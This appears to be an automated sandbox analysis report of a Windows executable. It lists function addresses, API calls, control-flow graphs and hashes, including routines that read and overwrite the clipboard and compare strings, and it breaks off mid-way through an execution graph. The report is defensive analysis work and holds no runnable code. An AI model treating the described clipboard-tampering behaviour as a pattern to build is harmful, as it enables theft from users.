                                                                              Function 0040117A Relevance: 4.5, APIs: 3, Instructions: 19sleepthreadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 174 40117a-401199 SetErrorMode CreateThread 175 40119f-4011aa Sleep 174->175 175->175
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00000002), ref: 00401186
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000019FC,00000000,00000000,?), ref: 00401199
                                                                              • Sleep.KERNELBASE(000003E8), ref: 004011A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorModeSleepThread
                                                                              • String ID:
                                                                              • API String ID: 3248957813-0
                                                                              • Opcode ID: 0aaf74de947cf09fcbc382f524d87e536203a4c451b84d5d1fb70a808e8b5a51
                                                                              • Instruction ID: 9bf0ace998406ab45eb8bca131e2ae766c8bbbdf713bfe71c18c6d6cca4ad349
                                                                              • Opcode Fuzzy Hash: 0aaf74de947cf09fcbc382f524d87e536203a4c451b84d5d1fb70a808e8b5a51
                                                                              • Instruction Fuzzy Hash: 25D01271442329FBD2115B928E0DE9F7E2CEF05750B104125F205B50D0C6B41A05D7F9

                                                                              Non-executed Functions

                                                                              Function 00401110 Relevance: 15.0, APIs: 10, Instructions: 40stringclipboardmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • lstrlenW.KERNEL32(0040181C,?,?,0040181C,?), ref: 0040111D
                                                                              • lstrlenW.KERNEL32(0040181C,?,?,0040181C,?), ref: 00401128
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,0040181C,?), ref: 00401130
                                                                              • lstrlenW.KERNEL32(0040181C,?,0040181C,?), ref: 0040113B
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00401143
                                                                              • lstrcpynW.KERNEL32(00000000,?,0040181C,?), ref: 0040114A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00401151
                                                                              • OpenClipboard.USER32(00000000), ref: 00401159
                                                                              • EmptyClipboard.USER32 ref: 0040115F
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00401168
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardGloballstrlen$AllocDataEmptyLockOpenUnlocklstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 2190372231-0
                                                                              • Opcode ID: c76c1d3acf8a888a83501a2abf62e77fcfbbed505cc8e3d4977d1f3d56cfbd70
                                                                              • Instruction ID: 382cd622726ae073f377cc300ee255c1cdcc55c2e9a7aa130b3becefa4f171ec
                                                                              • Opcode Fuzzy Hash: c76c1d3acf8a888a83501a2abf62e77fcfbbed505cc8e3d4977d1f3d56cfbd70
                                                                              • Instruction Fuzzy Hash: 4BF0E736040214AFE7052FA0EF4DAAA7F2DFB09255F004021FB49A50A0CAB58940CBA8
                                                                              Function 00401000 Relevance: 12.0, APIs: 8, Instructions: 36stringclipboardCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • OpenClipboard.USER32(00000000), ref: 00401007
                                                                              • GetClipboardData.USER32(0000000D), ref: 00401015
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040101E
                                                                              • lstrlenW.KERNEL32(00000000,?,00401667,?), ref: 00401027
                                                                              • lstrcpyW.KERNEL32(00401667,00000000,?,00401667,?), ref: 0040103B
                                                                              • lstrlenW.KERNEL32(00000000,?,00401667,?), ref: 00401042
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040104B
                                                                              • CloseClipboard.USER32 ref: 00401051
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Globallstrlen$CloseDataLockOpenUnlocklstrcpy
                                                                              • String ID:
                                                                              • API String ID: 133535211-0
                                                                              • Opcode ID: c0398e3963ca7d0d48ae09680e5e8d4b26db440a6e307dc8cf2614e7217fd2cd
                                                                              • Instruction ID: 6a73acc55248e94248dccdeff2764bf1941a966b467eb366ae5acf9a7f886809
                                                                              • Opcode Fuzzy Hash: c0398e3963ca7d0d48ae09680e5e8d4b26db440a6e307dc8cf2614e7217fd2cd
                                                                              • Instruction Fuzzy Hash: 21F0F431200314ABD7202B75AF4CE6B7B6CEB867667044135FB06E11E1DA788845C669
                                                                              Function 0040147D Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 118stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 176 40147d-401486 177 401490-4014a2 176->177 178 401488-40148b 176->178 180 4014a4 177->180 181 4014ca-4014d2 177->181 179 4015b2-4015b4 178->179 182 4014a9-4014af 180->182 183 4014d4 181->183 184 4014fa-401502 181->184 182->181 185 4014b1-4014b8 lstrcmpiW 182->185 186 4014d9-4014df 183->186 187 401504 184->187 188 40152a-401532 184->188 189 4015b5-4015b8 185->189 190 4014be-4014c8 185->190 186->184 191 4014e1-4014e8 lstrcmpiW 186->191 192 401509-40150f 187->192 193 401534 188->193 194 401556-40155e 188->194 195 4015b0-4015b1 189->195 190->181 190->182 191->189 198 4014ee-4014f8 191->198 192->188 199 401511-401518 lstrcmpiW 192->199 200 401539-40153f 193->200 196 401560 194->196 197 401582-40158a 194->197 195->179 202 401565-40156b 196->202 203 40158c 197->203 204 4015ae 197->204 198->184 198->186 199->189 205 40151e-401528 199->205 200->194 201 401541-401548 lstrcmpiW 200->201 201->189 206 40154a-401554 201->206 202->197 207 40156d-401574 lstrcmpiW 202->207 208 401591-401597 203->208 204->195 205->188 205->192 206->194 206->200 207->189 209 401576-401580 207->209 208->204 210 401599-4015a0 lstrcmpiW 208->210 209->197 209->202 210->189 211 4015a2-4015ac 210->211 211->204 211->208
                                                                              APIs
                                                                              • lstrcmpiW.KERNEL32(004040AC,004019C0,?,00000001,?,?,004019C0,?), ref: 004014B4
                                                                              • lstrcmpiW.KERNEL32(0040404C,004019C0,?,00000001,?,?,004019C0,?), ref: 004014E4
                                                                              • lstrcmpiW.KERNEL32(p'@,004019C0,?,00000001,?,?,004019C0,?), ref: 00401514
                                                                              • lstrcmpiW.KERNEL32(00404024,004019C0,?,00000001,?,?,004019C0,?), ref: 00401544
                                                                              • lstrcmpiW.KERNEL32(00404000,004019C0,?,00000001,?,?,004019C0,?), ref: 00401570
                                                                              • lstrcmpiW.KERNEL32(@*@,004019C0,?,00000001,?,?,004019C0,?), ref: 0040159C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpi
                                                                              • String ID: '@$80@$@*@$H%@$p'@
                                                                              • API String ID: 1586166983-1387902636
                                                                              • Opcode ID: 35bc3aa46ff7794753548224ef2b11b2f27fd9dd6b689f4bcbaa5f3487b0a1d7
                                                                              • Instruction ID: 80cb88ceffac64fae00d0d44dd043b146e58d3bf3e66f92092fa637bf8d3de82
                                                                              • Opcode Fuzzy Hash: 35bc3aa46ff7794753548224ef2b11b2f27fd9dd6b689f4bcbaa5f3487b0a1d7
                                                                              • Instruction Fuzzy Hash: EA310076D00151EBEB25AB69DC4081763B5EBC135035A847BEA4BBB2F0E7399D40C79C
                                                                              Function 0040105E Relevance: 15.1, APIs: 10, Instructions: 70stringmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 212 40105e-401068 213 40110a 212->213 214 40106e-401073 212->214 216 40110c-40110f 213->216 214->213 215 401079-40107d 214->215 215->213 217 401083-401091 call 401b86 215->217 217->213 220 401093-4010b2 lstrlenW GlobalAlloc 217->220 221 4010b4-4010b8 lstrcpynW 220->221 222 4010be-4010de lstrcatW lstrlenW * 2 220->222 221->222 223 4010e0-4010ef lstrlenW lstrcatW 222->223 224 4010f5-401108 lstrcpyW GlobalFree 222->224 223->224 224->216
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,004018D4,?,?), ref: 00401095
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,004018D4,?,?), ref: 004010A1
                                                                              • lstrcpynW.KERNEL32(00000000,?,?,?,004018D4,?,?), ref: 004010B8
                                                                              • lstrcatW.KERNEL32(00000000,00000000,?,004018D4,?,?), ref: 004010C2
                                                                              • lstrlenW.KERNEL32(?,?,004018D4,?,?), ref: 004010C9
                                                                              • lstrlenW.KERNEL32(00000000,?,004018D4,?,?), ref: 004010D6
                                                                              • lstrlenW.KERNEL32(?,?,004018D4,?,?), ref: 004010E1
                                                                              • lstrcatW.KERNEL32(00000000,00000000,?,004018D4,?,?), ref: 004010EF
                                                                              • lstrcpyW.KERNEL32(?,00000000,?,004018D4,?,?), ref: 004010F7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004010FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$Globallstrcat$AllocFreelstrcpylstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 1790437291-0
                                                                              • Opcode ID: 491d2c14ad5fa41c5e1c91f5ccb1bb8fc2083fc252744d542bb224581419020f
                                                                              • Instruction ID: d310636c8a5c4712b9c42567c05d020cf8cf7e887a5d3d3086e9f8642cd53238
                                                                              • Opcode Fuzzy Hash: 491d2c14ad5fa41c5e1c91f5ccb1bb8fc2083fc252744d542bb224581419020f
                                                                              • Instruction Fuzzy Hash: 93118431100325ABD7195F60DE8CDBF3B6CEF457557004039FB06A61A0DBB89946C7A8

                                                                              Execution Graph

                                                                              Execution Coverage:8.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:4.1%
                                                                              Total number of Nodes:1817
                                                                              Total number of Limit Nodes:30
                                                                              execution_graph 31247 de1a9b 31248 de1aa5 31247->31248 31251 de2160 31248->31251 31277 de1ebe 31251->31277 31253 de2170 31254 de21cd 31253->31254 31255 de21f1 31253->31255 31256 de20fe DloadReleaseSectionWriteAccess 8 API calls 31254->31256 31258 de2269 LoadLibraryExA 31255->31258 31260 de22ca 31255->31260 31267 de22dc 31255->31267 31271 de2398 31255->31271 31257 de21d8 RaiseException 31256->31257 31272 de1ab2 31257->31272 31259 de227c GetLastError 31258->31259 31258->31260 31262 de228f 31259->31262 31263 de22a5 31259->31263 31261 de22d5 FreeLibrary 31260->31261 31260->31267 31261->31267 31262->31260 31262->31263 31265 de20fe DloadReleaseSectionWriteAccess 8 API calls 31263->31265 31264 de233a GetProcAddress 31266 de234a GetLastError 31264->31266 31264->31271 31268 de22b0 RaiseException 31265->31268 31269 de235d 31266->31269 31267->31264 31267->31271 31268->31272 31269->31271 31273 de20fe DloadReleaseSectionWriteAccess 8 API calls 31269->31273 31288 de20fe 31271->31288 31274 de237e RaiseException 31273->31274 31275 de1ebe ___delayLoadHelper2@8 8 API calls 31274->31275 31276 de2395 31275->31276 31276->31271 31278 de1eca 31277->31278 31279 de1ef0 31277->31279 31296 de1f67 31278->31296 31279->31253 31281 de1ecf 31282 de1eeb 31281->31282 31301 de2090 31281->31301 31306 de1ef1 GetModuleHandleW GetProcAddress GetProcAddress 31282->31306 31285 de2139 31286 de2155 31285->31286 31287 de2151 RtlReleaseSRWLockExclusive 31285->31287 31286->31253 31287->31253 31289 de2132 31288->31289 31290 de2110 31288->31290 31289->31272 31291 de1f67 DloadReleaseSectionWriteAccess 4 API calls 31290->31291 31292 de2115 31291->31292 31293 de212d 31292->31293 31294 de2090 DloadProtectSection 3 API calls 31292->31294 31309 de2134 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 31293->31309 31294->31293 31307 de1ef1 GetModuleHandleW GetProcAddress GetProcAddress 31296->31307 31298 de1f6c 31299 de1f88 31298->31299 31300 de1f84 RtlAcquireSRWLockExclusive 31298->31300 31299->31281 31300->31281 31302 de20a5 DloadProtectSection 31301->31302 31303 de20e0 VirtualProtect 31302->31303 31304 de20ab 31302->31304 31308 de1fa6 VirtualQuery GetSystemInfo 31302->31308 31303->31304 31304->31282 31306->31285 31307->31298 31308->31303 31309->31289 31313 de1d55 31314 de2160 ___delayLoadHelper2@8 17 API calls 31313->31314 31315 de1d62 31314->31315 31316 de1bd2 31317 de1adb 31316->31317 31318 de2160 ___delayLoadHelper2@8 17 API calls 31317->31318 31318->31317 31319 de3152 31320 de315e __FrameHandler3::FrameUnwindToState 31319->31320 31347 de2ca0 31320->31347 31322 de3165 31323 de32b8 31322->31323 31332 de318f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 31322->31332 31450 de3559 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 31323->31450 31325 de32bf 31443 decd33 31325->31443 31329 de32cd 31330 de31ae 31331 de322f 31358 de3674 31331->31358 31332->31330 31332->31331 31446 dec891 39 API calls 3 library calls 31332->31446 31341 de3251 31341->31325 31342 de3255 31341->31342 31343 de325e 31342->31343 31448 decce8 21 API calls CallUnexpected 31342->31448 31449 de2e11 75 API calls ___scrt_uninitialize_crt 31343->31449 31346 de3266 31346->31330 31348 de2ca9 31347->31348 31452 de3375 IsProcessorFeaturePresent 31348->31452 31350 de2cb5 31453 de636e 31350->31453 31352 de2cba 31353 de2cbe 31352->31353 31461 ded6ae 31352->31461 31353->31322 31356 de2cd5 31356->31322 31586 de4480 31358->31586 31361 de3235 31362 ded78b 31361->31362 31588 df09b0 31362->31588 31364 ded794 31366 de323d 31364->31366 31594 df0ce1 39 API calls 31364->31594 31367 dde674 31366->31367 31791 dd65f3 31367->31791 31371 dde6a0 31879 ddd16c 31371->31879 31373 dde6a9 31883 dc21e6 31373->31883 31376 dc21e6 41 API calls 31377 dde6c1 31376->31377 31378 dc21e6 41 API calls 31377->31378 31379 dde6cd 31378->31379 31380 dc21e6 41 API calls 31379->31380 31381 dde6d9 CallUnexpected 31380->31381 31887 ddea06 31381->31887 31383 dde703 31384 dde70f GetCommandLineW 31383->31384 31385 dde71f 31384->31385 31406 dde80b 31384->31406 31896 dc1d16 31385->31896 31388 dde81d 31937 dc3060 31388->31937 31392 dde732 31394 dde7f8 31392->31394 31395 dde747 OpenFileMappingW 31392->31395 31393 dde82a 31396 dde83a SetEnvironmentVariableW GetLocalTime 31393->31396 31399 dc1d16 41 API calls 31394->31399 31397 dde7ef CloseHandle 31395->31397 31398 dde763 MapViewOfFile 31395->31398 31943 dcf858 31396->31943 31397->31406 31401 dde7ed 31398->31401 31405 dde775 31398->31405 31402 dde802 31399->31402 31401->31397 31914 ddea58 31402->31914 31408 dde77d UnmapViewOfFile MapViewOfFile 31405->31408 31925 dd19a6 31406->31925 31408->31397 31409 dde7a0 31408->31409 31966 dde5e6 41 API calls 2 library calls 31409->31966 31410 dde8ce 31951 ddb83a 31410->31951 31413 dde8da 31415 ddb83a 41 API calls 31413->31415 31414 dde7ae 31416 ddea58 43 API calls 31414->31416 31417 dde8e3 DialogBoxParamW 31415->31417 31418 dde7bb 31416->31418 31957 ddb89a 31417->31957 31967 dd4d61 88 API calls 31418->31967 31421 dde920 31423 ddb89a 14 API calls 31421->31423 31422 dde7cf 31968 dd4c9a 88 API calls 31422->31968 31425 dde92c 31423->31425 31427 dde93c 31425->31427 31428 dde935 Sleep 31425->31428 31426 dde7da 31430 dde7e6 UnmapViewOfFile 31426->31430 31429 dde94a 31427->31429 31969 de107a 42 API calls __EH_prolog3_GS 31427->31969 31428->31427 31432 dde954 DeleteObject 31429->31432 31430->31401 31433 dde969 DeleteObject 31432->31433 31434 dde970 31432->31434 31433->31434 31435 dde9a1 31434->31435 31438 dde9b2 31434->31438 31970 de1016 6 API calls 31435->31970 31437 dde9a6 CloseHandle 31437->31438 31963 ddd1cb 31438->31963 31440 dde9ed 31441 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 31440->31441 31442 ddea00 31441->31442 31447 de36aa GetModuleHandleW 31442->31447 32464 decb67 31443->32464 31446->31331 31447->31341 31448->31343 31449->31346 31450->31325 31451 deccf7 21 API calls CallUnexpected 31451->31329 31452->31350 31465 de7417 31453->31465 31456 de6377 31456->31352 31458 de637f 31459 de638a 31458->31459 31479 de7453 DeleteCriticalSection 31458->31479 31459->31352 31506 df147a 31461->31506 31464 de638d 7 API calls 2 library calls 31464->31353 31466 de7420 31465->31466 31468 de7449 31466->31468 31469 de6373 31466->31469 31480 de765c 31466->31480 31485 de7453 DeleteCriticalSection 31468->31485 31469->31456 31471 de649c 31469->31471 31499 de756d 31471->31499 31475 de64bf 31476 de64cc 31475->31476 31505 de64cf 6 API calls ___vcrt_FlsFree 31475->31505 31476->31458 31478 de64b1 31478->31458 31479->31456 31486 de7482 31480->31486 31483 de7694 InitializeCriticalSectionAndSpinCount 31484 de767f 31483->31484 31484->31466 31485->31469 31487 de749f 31486->31487 31491 de74a3 31486->31491 31487->31483 31487->31484 31488 de750b GetProcAddress 31488->31487 31490 de7519 31488->31490 31490->31487 31491->31487 31491->31488 31492 de74fc 31491->31492 31494 de7522 LoadLibraryExW 31491->31494 31492->31488 31493 de7504 FreeLibrary 31492->31493 31493->31488 31495 de7569 31494->31495 31496 de7539 GetLastError 31494->31496 31495->31491 31496->31495 31497 de7544 ___vcrt_FlsFree 31496->31497 31497->31495 31498 de755a LoadLibraryExW 31497->31498 31498->31491 31500 de7482 ___vcrt_FlsFree 5 API calls 31499->31500 31501 de7587 31500->31501 31502 de75a0 TlsAlloc 31501->31502 31503 de64a6 31501->31503 31503->31478 31504 de761e 6 API calls ___vcrt_FlsFree 31503->31504 31504->31475 31505->31478 31507 df148a 31506->31507 31508 de2cc7 31506->31508 31507->31508 31510 def420 31507->31510 31508->31356 31508->31464 31511 def42c __FrameHandler3::FrameUnwindToState 31510->31511 31522 def941 EnterCriticalSection 31511->31522 31513 def433 31523 df1b7c 31513->31523 31518 def44c 31537 def36f GetStdHandle GetFileType 31518->31537 31519 def462 31519->31507 31521 def451 31538 def477 LeaveCriticalSection CallUnexpected 31521->31538 31522->31513 31524 df1b88 __FrameHandler3::FrameUnwindToState 31523->31524 31525 df1bb2 31524->31525 31526 df1b91 31524->31526 31539 def941 EnterCriticalSection 31525->31539 31547 dee1e7 14 API calls __dosmaperr 31526->31547 31529 df1b96 31548 de7a2f 39 API calls CallUnexpected 31529->31548 31530 df1bbe 31535 df1bea 31530->31535 31540 df1acc 31530->31540 31532 def442 31532->31521 31536 def2b9 42 API calls 31532->31536 31549 df1c11 LeaveCriticalSection CallUnexpected 31535->31549 31536->31518 31537->31521 31538->31519 31539->31530 31550 def9f4 31540->31550 31542 df1ade 31546 df1aeb 31542->31546 31557 df1317 31542->31557 31562 dee1fa 31546->31562 31547->31529 31548->31532 31549->31532 31556 defa01 _unexpected 31550->31556 31551 defa41 31569 dee1e7 14 API calls __dosmaperr 31551->31569 31552 defa2c RtlAllocateHeap 31554 defa3f 31552->31554 31552->31556 31554->31542 31556->31551 31556->31552 31568 dec80e EnterCriticalSection LeaveCriticalSection _unexpected 31556->31568 31570 df1134 31557->31570 31560 df1351 InitializeCriticalSectionAndSpinCount 31561 df133c 31560->31561 31561->31542 31563 dee205 RtlFreeHeap 31562->31563 31564 dee22f 31562->31564 31563->31564 31565 dee21a GetLastError 31563->31565 31564->31530 31566 dee227 __dosmaperr 31565->31566 31585 dee1e7 14 API calls __dosmaperr 31566->31585 31568->31556 31569->31554 31571 df1164 31570->31571 31572 df1160 31570->31572 31571->31572 31577 df1069 31571->31577 31572->31560 31572->31561 31575 df117e GetProcAddress 31575->31572 31576 df118e _unexpected 31575->31576 31576->31572 31583 df107a ___vcrt_FlsFree 31577->31583 31578 df1110 31578->31572 31578->31575 31579 df1098 LoadLibraryExW 31580 df1117 31579->31580 31581 df10b3 GetLastError 31579->31581 31580->31578 31582 df1129 FreeLibrary 31580->31582 31581->31583 31582->31578 31583->31578 31583->31579 31584 df10e6 LoadLibraryExW 31583->31584 31584->31580 31584->31583 31585->31564 31587 de3687 GetStartupInfoW 31586->31587 31587->31361 31589 df09b9 31588->31589 31593 df09eb 31588->31593 31595 dedf14 31589->31595 31593->31364 31594->31364 31596 dedf1f 31595->31596 31597 dedf25 31595->31597 31643 df1296 6 API calls _unexpected 31596->31643 31616 dedf2b 31597->31616 31644 df12d5 6 API calls _unexpected 31597->31644 31600 dedf3f 31601 def9f4 _unexpected 14 API calls 31600->31601 31600->31616 31603 dedf4f 31601->31603 31605 dedf6c 31603->31605 31606 dedf57 31603->31606 31646 df12d5 6 API calls _unexpected 31605->31646 31645 df12d5 6 API calls _unexpected 31606->31645 31609 dedf78 31611 dedf7c 31609->31611 31612 dedf8b 31609->31612 31610 dedf63 31615 dee1fa ___free_lconv_mon 14 API calls 31610->31615 31647 df12d5 6 API calls _unexpected 31611->31647 31648 dedc7d 14 API calls _unexpected 31612->31648 31615->31616 31619 dedf30 31616->31619 31649 deda68 39 API calls CallUnexpected 31616->31649 31617 dedf96 31618 dee1fa ___free_lconv_mon 14 API calls 31617->31618 31618->31619 31620 df07b3 31619->31620 31650 df0908 31620->31650 31625 df07f6 31625->31593 31628 df080f 31630 dee1fa ___free_lconv_mon 14 API calls 31628->31630 31629 df081d 31675 df0a0b 31629->31675 31630->31625 31633 df0855 31686 dee1e7 14 API calls __dosmaperr 31633->31686 31635 df085a 31638 dee1fa ___free_lconv_mon 14 API calls 31635->31638 31636 df089c 31637 df08e5 31636->31637 31687 df042c 39 API calls 2 library calls 31636->31687 31642 dee1fa ___free_lconv_mon 14 API calls 31637->31642 31638->31625 31639 df0870 31639->31636 31640 dee1fa ___free_lconv_mon 14 API calls 31639->31640 31640->31636 31642->31625 31643->31597 31644->31600 31645->31610 31646->31609 31647->31610 31648->31617 31651 df0914 __FrameHandler3::FrameUnwindToState 31650->31651 31655 df092e 31651->31655 31688 def941 EnterCriticalSection 31651->31688 31653 df096a 31689 df0987 LeaveCriticalSection CallUnexpected 31653->31689 31654 df07dd 31661 df053a 31654->31661 31655->31654 31690 deda68 39 API calls CallUnexpected 31655->31690 31659 df093e 31659->31653 31660 dee1fa ___free_lconv_mon 14 API calls 31659->31660 31660->31653 31691 dec634 31661->31691 31664 df056d 31666 df0572 GetACP 31664->31666 31667 df0584 31664->31667 31665 df055b GetOEMCP 31665->31667 31666->31667 31667->31625 31668 dee234 31667->31668 31669 dee272 31668->31669 31674 dee242 _unexpected 31668->31674 31703 dee1e7 14 API calls __dosmaperr 31669->31703 31670 dee25d RtlAllocateHeap 31672 dee270 31670->31672 31670->31674 31672->31628 31672->31629 31674->31669 31674->31670 31702 dec80e EnterCriticalSection LeaveCriticalSection _unexpected 31674->31702 31676 df053a 41 API calls 31675->31676 31677 df0a2b 31676->31677 31678 df0b30 31677->31678 31679 df0a68 IsValidCodePage 31677->31679 31685 df0a83 CallUnexpected 31677->31685 31715 de2815 31678->31715 31679->31678 31681 df0a7a 31679->31681 31683 df0aa3 GetCPInfo 31681->31683 31681->31685 31682 df084a 31682->31633 31682->31639 31683->31678 31683->31685 31704 df060e 31685->31704 31686->31635 31687->31637 31688->31659 31689->31655 31692 dec652 31691->31692 31698 dec64b 31691->31698 31692->31698 31699 dede59 39 API calls 3 library calls 31692->31699 31694 dec673 31700 dee282 39 API calls ___scrt_uninitialize_crt 31694->31700 31696 dec689 31701 dee2e0 39 API calls ___scrt_uninitialize_crt 31696->31701 31698->31664 31698->31665 31699->31694 31700->31696 31701->31698 31702->31674 31703->31672 31705 df0636 GetCPInfo 31704->31705 31706 df06ff 31704->31706 31705->31706 31707 df064e 31705->31707 31709 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 31706->31709 31722 df1fe6 31707->31722 31711 df07b1 31709->31711 31711->31678 31714 def892 43 API calls 31714->31706 31716 de281e IsProcessorFeaturePresent 31715->31716 31717 de281d 31715->31717 31719 de29e8 31716->31719 31717->31682 31790 de29ab SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 31719->31790 31721 de2acb 31721->31682 31723 dec634 39 API calls 31722->31723 31724 df2006 31723->31724 31742 df0db1 31724->31742 31726 df20ba 31745 def8db 14 API calls ___free_lconv_mon 31726->31745 31727 df2033 31727->31726 31730 dee234 15 API calls 31727->31730 31732 df20c2 31727->31732 31733 df2058 __alloca_probe_16 CallUnexpected 31727->31733 31728 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 31731 df06b6 31728->31731 31730->31733 31737 def892 31731->31737 31732->31728 31733->31726 31734 df0db1 ___scrt_uninitialize_crt MultiByteToWideChar 31733->31734 31735 df20a1 31734->31735 31735->31726 31736 df20a8 GetStringTypeW 31735->31736 31736->31726 31738 dec634 39 API calls 31737->31738 31739 def8a5 31738->31739 31748 def6a3 31739->31748 31746 df0d19 31742->31746 31745->31732 31747 df0d2a MultiByteToWideChar 31746->31747 31747->31727 31749 def6be 31748->31749 31750 df0db1 ___scrt_uninitialize_crt MultiByteToWideChar 31749->31750 31754 def702 31750->31754 31751 def87d 31752 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 31751->31752 31753 def890 31752->31753 31753->31714 31754->31751 31755 dee234 15 API calls 31754->31755 31757 def728 __alloca_probe_16 31754->31757 31768 def7d0 31754->31768 31755->31757 31758 df0db1 ___scrt_uninitialize_crt MultiByteToWideChar 31757->31758 31757->31768 31759 def771 31758->31759 31759->31768 31776 df1362 31759->31776 31762 def7df 31764 def868 31762->31764 31765 dee234 15 API calls 31762->31765 31769 def7f1 __alloca_probe_16 31762->31769 31763 def7a7 31767 df1362 6 API calls 31763->31767 31763->31768 31784 def8db 14 API calls ___free_lconv_mon 31764->31784 31765->31769 31767->31768 31785 def8db 14 API calls ___free_lconv_mon 31768->31785 31769->31764 31770 df1362 6 API calls 31769->31770 31771 def834 31770->31771 31771->31764 31782 df0e6b WideCharToMultiByte ___scrt_uninitialize_crt 31771->31782 31773 def84e 31773->31764 31774 def857 31773->31774 31783 def8db 14 API calls ___free_lconv_mon 31774->31783 31786 df1035 31776->31786 31780 